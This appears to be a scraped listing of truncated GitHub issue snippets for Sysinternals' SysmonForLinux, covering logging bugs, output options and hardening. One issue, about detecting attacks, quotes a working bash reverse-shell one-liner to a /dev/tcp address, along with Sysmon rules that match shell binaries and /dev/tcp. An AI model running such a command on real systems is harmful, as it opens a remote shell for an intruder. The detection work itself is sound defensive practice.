SysmonForLinux
SysmonForLinux copied to clipboard
Sysinternals
OS: Ubuntu 20.04 Installation instruction: https://github.com/Sysinternals/SysmonForLinux/blob/main/INSTALL.md#ubuntu-1804-2004--2104 sysmon config: ```xml ``` command for making dns query: `ping www.google.com` checking event id: `sudo cat /var/log/syslog | grep -oP "EventID>\d+
In some "network connect" events of the sysmon log the "Image" value is not displayed. Instead the value (null) is displayed. For example, the pip was updated here: ``` Event...
#### Description I'm trying to detect the following basic `bash` reverse shell `bash -i >& /dev/tcp/10.0.0.1/4242 0>&1`. I have the following Sysmon rules enabled: ```xml /bin/bash /bin/dash /bin/sh /dev/tcp /dev/udp...
The socket option allows sysmon to create a unix domain socket over which to send events to a local listener instead of writing the logs to disk. The json option...
If an application calls accept() with the addr argument set to NULL, then the remote IP address and port will be set to 0. The networkTracker::seenAccept() function needs to recognise...
Is there a possibility to change to OUTPUT file to a custom /var/log destination ? In some cases you want to use for example /var/log/sysmon instead of the standard syslog,...
Is it possible for this project to get JSON support? Windows Sysmon with XML is auto-handled by most log agents to abstract the XML parsing away. However, Linux log agents...
as best practice, executable should have a test/dry-run option to test configuration (syntax and working execution) Something that can be used for example in ansible template deployment to ensure not...
As security tool, we want to ensure not adding more attack surface than what is prevented/detected. From early testing, following is working on Ubuntu 18.04, 20.04 and Centos8 with few...
I took options standard for Ubuntu 20.04 and Centos/RHEL as current ones. That should not be blocking on older releases, just some warning of unsupported options. Commented out options for...